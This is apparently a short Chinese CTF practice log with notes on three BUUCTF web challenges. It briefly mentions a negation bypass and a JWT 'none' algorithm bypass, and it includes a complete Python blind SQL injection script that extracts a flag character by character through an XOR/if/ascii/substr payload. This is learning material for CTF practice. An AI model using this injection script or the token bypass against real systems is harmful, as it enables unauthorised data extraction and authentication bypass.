[SUCTF 2019]EasyWeb
做了一半做不动了,换个时间来,花费了很多时间,不过会构造取反绕过了也不错
[HFCTF2020]EasyLogin
一开始以为是seesion伪造,发现我做错了,然后还加了转义字符,不知道怎么做了,看了别人的WP,也就是加密算法改为none绕过
[HFCTF2020]EasyLogin
[HFCTF2020]EasyLogin
[CISCN2019 华北赛区 Day2 Web1]Hack World
不算太难
import requests
import time
url = "http://b8c664e5-963f-4117-9a97-9ba6567e2a49.node3.buuoj.cn/index.php"
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
payload = {
'id': f'0^if(ascii(substr((select(flag)from(flag)),({i}),(1)))>{mid},1,0)'
}
r = requests.post(url,data=payload)
print(r.text)
if "glzjin wants a girlfriend" in r.text:
head = mid + 1
else:
tail = mid
time.sleep(0.2)
if head != 32:
result += chr(head)
else:
break
print(result)
